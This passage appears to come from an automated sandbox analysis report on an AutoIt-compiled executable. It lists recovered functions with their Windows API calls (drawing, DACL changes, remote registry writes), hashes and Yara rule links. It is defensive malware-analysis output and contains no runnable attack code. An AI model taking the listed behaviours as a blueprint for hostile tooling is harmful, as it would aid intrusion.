                                                        • GetSysColor.USER32(00000010), ref: 00E871C8
                                                        • CreateSolidBrush.GDI32(00000000), ref: 00E871CF
                                                        • FrameRect.USER32(?,?,00000000), ref: 00E871DE
                                                        • DeleteObject.GDI32(00000000), ref: 00E871E5
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00E87230
                                                        • FillRect.USER32(?,?,?), ref: 00E87262
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E87284
                                                          • Part of subcall function 00E873E8: GetSysColor.USER32(00000012), ref: 00E87421
                                                          • Part of subcall function 00E873E8: SetTextColor.GDI32(?,?), ref: 00E87425
                                                          • Part of subcall function 00E873E8: GetSysColorBrush.USER32(0000000F), ref: 00E8743B
                                                          • Part of subcall function 00E873E8: GetSysColor.USER32(0000000F), ref: 00E87446
                                                          • Part of subcall function 00E873E8: GetSysColor.USER32(00000011), ref: 00E87463
                                                          • Part of subcall function 00E873E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E87471
                                                          • Part of subcall function 00E873E8: SelectObject.GDI32(?,00000000), ref: 00E87482
                                                          • Part of subcall function 00E873E8: SetBkColor.GDI32(?,00000000), ref: 00E8748B
                                                          • Part of subcall function 00E873E8: SelectObject.GDI32(?,?), ref: 00E87498
                                                          • Part of subcall function 00E873E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00E874B7
                                                          • Part of subcall function 00E873E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E874CE
                                                          • Part of subcall function 00E873E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00E874DB
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                        • String ID:
                                                        • API String ID: 4124339563-0
                                                        • Opcode ID: e4551ed4af3edf000eb69029aed12f3f46c702abbb6c6727778dd3b19df5e857
                                                        • Instruction ID: 063630bf13d54e07ae51c80b7d8078dc4492e12fa6e4e1abbb447f49c1a05880
                                                        • Opcode Fuzzy Hash: e4551ed4af3edf000eb69029aed12f3f46c702abbb6c6727778dd3b19df5e857
                                                        • Instruction Fuzzy Hash: A3A1A572009301AFDB00DF65DC48E5B7BA9FF49320F201A19F9AAB61E1D731D948CB61
                                                        Function 00E08D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?), ref: 00E08E14
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E46AC5
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E46AFE
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E46F43
                                                          • Part of subcall function 00E08F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E08BE8,?,00000000,?,?,?,?,00E08BBA,00000000,?), ref: 00E08FC5
                                                        • SendMessageW.USER32(?,00001053), ref: 00E46F7F
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E46F96
                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E46FAC
                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E46FB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 2760611726-4108050209
                                                        • Opcode ID: 9460ff5673fc22f96470abc4c93a439a498958e6f45dcee9bc542c6a4455337b
                                                        • Instruction ID: 5889f35f2f2b8ec96e67c33762843193abf585e0a8ebb7a99153a3a167bc78be
                                                        • Opcode Fuzzy Hash: 9460ff5673fc22f96470abc4c93a439a498958e6f45dcee9bc542c6a4455337b
                                                        • Instruction Fuzzy Hash: 4B12CF30600201DFDB25DF15ED84BA5B7E1FB46304F146469F589BB2A2CB32EC96DB52
                                                        Function 00E72711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 00E7273E
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E7286A
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00E728A9
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00E728B9
                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00E72900
                                                        • GetClientRect.USER32(00000000,?), ref: 00E7290C
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00E72955
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E72964
                                                        • GetStockObject.GDI32(00000011), ref: 00E72974
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00E72978
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00E72988
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E72991
                                                        • DeleteDC.GDI32(00000000), ref: 00E7299A
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E729C6
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E729DD
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00E72A1D
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E72A31
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E72A42
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00E72A77
                                                        • GetStockObject.GDI32(00000011), ref: 00E72A82
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E72A8D
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00E72A97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: b88839378db3b2a2d25278adfa9822a2f6459ae1a0ff24429c0f9f569916139f
                                                        • Instruction ID: d436deb40678f7a08dd291762689011333e3a63866486bdbc52e32d5b512526d
                                                        • Opcode Fuzzy Hash: b88839378db3b2a2d25278adfa9822a2f6459ae1a0ff24429c0f9f569916139f
                                                        • Instruction Fuzzy Hash: 4FB19F71A00209AFEB14CF69CC89EAE7BB9EB05714F118159FA18F7290D774ED04CBA0
                                                        Function 00E64ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E64AED
                                                        • GetDriveTypeW.KERNEL32(?,00E8CB68,?,\\.\,00E8CC08), ref: 00E64BCA
                                                        • SetErrorMode.KERNEL32(00000000,00E8CB68,?,\\.\,00E8CC08), ref: 00E64D36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: e30b7022a39f9db37ceb1b8998f97be07022dcff927bc7d34d7a17c252534512
                                                        • Instruction ID: 4f9526dc4a0155ea22a86aa4187a648057cdd7d1ae1a1a41e7fc2e8ed526ccc5
                                                        • Opcode Fuzzy Hash: e30b7022a39f9db37ceb1b8998f97be07022dcff927bc7d34d7a17c252534512
                                                        • Instruction Fuzzy Hash: 6C61D4F16852099BDB04EF18D982AFAFBA0EF44384B24B415F806BB3D1DA35DD41DB51
                                                        Function 00E873E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00E87421
                                                        • SetTextColor.GDI32(?,?), ref: 00E87425
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E8743B
                                                        • GetSysColor.USER32(0000000F), ref: 00E87446
                                                        • CreateSolidBrush.GDI32(?), ref: 00E8744B
                                                        • GetSysColor.USER32(00000011), ref: 00E87463
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E87471
                                                        • SelectObject.GDI32(?,00000000), ref: 00E87482
                                                        • SetBkColor.GDI32(?,00000000), ref: 00E8748B
                                                        • SelectObject.GDI32(?,?), ref: 00E87498
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00E874B7
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E874CE
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00E874DB
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8752A
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E87554
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00E87572
                                                        • DrawFocusRect.USER32(?,?), ref: 00E8757D
                                                        • GetSysColor.USER32(00000011), ref: 00E8758E
                                                        • SetTextColor.GDI32(?,00000000), ref: 00E87596
                                                        • DrawTextW.USER32(?,00E870F5,000000FF,?,00000000), ref: 00E875A8
                                                        • SelectObject.GDI32(?,?), ref: 00E875BF
                                                        • DeleteObject.GDI32(?), ref: 00E875CA
                                                        • SelectObject.GDI32(?,?), ref: 00E875D0
                                                        • DeleteObject.GDI32(?), ref: 00E875D5
                                                        • SetTextColor.GDI32(?,?), ref: 00E875DB
                                                        • SetBkColor.GDI32(?,?), ref: 00E875E5
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 8b9c7a293cdae633938664a7673d50bddf7886beac66c13a0011294fc81917f2
                                                        • Instruction ID: 15f8a11f5f26636a5f79bc3bc72bba567a9b503314be4cf70cbde802615602ab
                                                        • Opcode Fuzzy Hash: 8b9c7a293cdae633938664a7673d50bddf7886beac66c13a0011294fc81917f2
                                                        • Instruction Fuzzy Hash: BE617D72900218AFDF019FA5DC49EEE7FB9EB09320F205115F919BB2A1D7709940DBA0
                                                        Function 00E80FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00E81128
                                                        • GetDesktopWindow.USER32 ref: 00E8113D
                                                        • GetWindowRect.USER32(00000000), ref: 00E81144
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E81199
                                                        • DestroyWindow.USER32(?), ref: 00E811B9
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E811ED
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8120B
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E8121D
                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E81232
                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E81245
                                                        • IsWindowVisible.USER32(00000000), ref: 00E812A1
                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E812BC
                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E812D0
                                                        • GetWindowRect.USER32(00000000,?), ref: 00E812E8
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00E8130E
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00E81328
                                                        • CopyRect.USER32(?,?), ref: 00E8133F
                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E813AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 4de1fdf4088a7e7941b6d4630e53630c188c7a4307a5048a43a0684cc12698ab
                                                        • Instruction ID: 3e78c125d60cfbab59bd32e04152a716e375e6624f057d10968e0aecc8c37c3d
                                                        • Opcode Fuzzy Hash: 4de1fdf4088a7e7941b6d4630e53630c188c7a4307a5048a43a0684cc12698ab
                                                        • Instruction Fuzzy Hash: B7B1AF71604341AFD700EF65C884B6ABBE8FF84754F00895CF99DAB261D731E845CBA2
                                                        Function 00E80241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00E802E5
                                                        • _wcslen.LIBCMT ref: 00E8031F
                                                        • _wcslen.LIBCMT ref: 00E80389
                                                        • _wcslen.LIBCMT ref: 00E803F1
                                                        • _wcslen.LIBCMT ref: 00E80475
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E804C5
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E80504
                                                          • Part of subcall function 00E0F9F2: _wcslen.LIBCMT ref: 00E0F9FD
                                                          • Part of subcall function 00E5223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E52258
                                                          • Part of subcall function 00E5223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E5228A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 1103490817-719923060
                                                        • Opcode ID: 2fefab0bc5a43fe8264322c9596c74f1f3f2092bb3352694235285e7b7ab52b2
                                                        • Instruction ID: 744eaa8bf908e4f2f9dc1164d51485768fa9182b2c80faa674590fc8f53520fc
                                                        • Opcode Fuzzy Hash: 2fefab0bc5a43fe8264322c9596c74f1f3f2092bb3352694235285e7b7ab52b2
                                                        • Instruction Fuzzy Hash: 2BE18E312082018FC764EF24C55186AB7E6BFC8318B15996DF89EBB7A1D730ED49CB61
                                                        Function 00E08891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E08968
                                                        • GetSystemMetrics.USER32(00000007), ref: 00E08970
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E0899B
                                                        • GetSystemMetrics.USER32(00000008), ref: 00E089A3
                                                        • GetSystemMetrics.USER32(00000004), ref: 00E089C8
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E089E5
                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E089F5
                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E08A28
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E08A3C
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00E08A5A
                                                        • GetStockObject.GDI32(00000011), ref: 00E08A76
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E08A81
                                                          • Part of subcall function 00E0912D: GetCursorPos.USER32(?), ref: 00E09141
                                                          • Part of subcall function 00E0912D: ScreenToClient.USER32(00000000,?), ref: 00E0915E
                                                          • Part of subcall function 00E0912D: GetAsyncKeyState.USER32(00000001), ref: 00E09183
                                                          • Part of subcall function 00E0912D: GetAsyncKeyState.USER32(00000002), ref: 00E0919D
                                                        • SetTimer.USER32(00000000,00000000,00000028,00E090FC), ref: 00E08AA8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 9f64579b56bba3ddbdf07d2340d19282881c9bb98a4874cca6ebb717cf713af7
                                                        • Instruction ID: fd954390cbc6a1c5ccdb09d4418a446f4fafca9aac5072d5e25a86dc309ba985
                                                        • Opcode Fuzzy Hash: 9f64579b56bba3ddbdf07d2340d19282881c9bb98a4874cca6ebb717cf713af7
                                                        • Instruction Fuzzy Hash: 2CB18A71A002099FDF14DFA9DD59BAA3BB4FB49314F10522AFA59B72D0DB30E841CB61
                                                        Function 00E50D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E51114
                                                          • Part of subcall function 00E510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E51120
                                                          • Part of subcall function 00E510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E5112F
                                                          • Part of subcall function 00E510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E51136
                                                          • Part of subcall function 00E510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E5114D
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E50DF5
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E50E29
                                                        • GetLengthSid.ADVAPI32(?), ref: 00E50E40
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00E50E7A
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E50E96
                                                        • GetLengthSid.ADVAPI32(?), ref: 00E50EAD
                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E50EB5
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E50EBC
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E50EDD
                                                        • CopySid.ADVAPI32(00000000), ref: 00E50EE4
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E50F13
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E50F35
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E50F47
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E50F6E
                                                        • HeapFree.KERNEL32(00000000), ref: 00E50F75
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E50F7E
                                                        • HeapFree.KERNEL32(00000000), ref: 00E50F85
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E50F8E
                                                        • HeapFree.KERNEL32(00000000), ref: 00E50F95
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E50FA1
                                                        • HeapFree.KERNEL32(00000000), ref: 00E50FA8
                                                          • Part of subcall function 00E51193: GetProcessHeap.KERNEL32(00000008,00E50BB1,?,00000000,?,00E50BB1,?), ref: 00E511A1
                                                          • Part of subcall function 00E51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E50BB1,?), ref: 00E511A8
                                                          • Part of subcall function 00E51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E50BB1,?), ref: 00E511B7
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                        • String ID:
                                                        • API String ID: 4175595110-0
                                                        • Opcode ID: d0b5024431fce3f619b28ac6a9c4db2627971f4af98907d3ed3508e64d5a771c
                                                        • Instruction ID: f46bd0537d6e31d68adc89ae0533a3e5862e2bbb6066d72f44d9972d7495e080
                                                        • Opcode Fuzzy Hash: d0b5024431fce3f619b28ac6a9c4db2627971f4af98907d3ed3508e64d5a771c
                                                        • Instruction Fuzzy Hash: 3D716A72A0020AAFDF209FA5DC49FEEBBB8BF05346F244515F919B6191D7319A09CB70
                                                        Function 00E7C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E7C4BD
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E8CC08,00000000,?,00000000,?,?), ref: 00E7C544
                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00E7C5A4
                                                        • _wcslen.LIBCMT ref: 00E7C5F4
                                                        • _wcslen.LIBCMT ref: 00E7C66F
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00E7C6B2
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00E7C7C1
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00E7C84D
                                                        • RegCloseKey.ADVAPI32(?), ref: 00E7C881
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E7C88E
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00E7C960
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
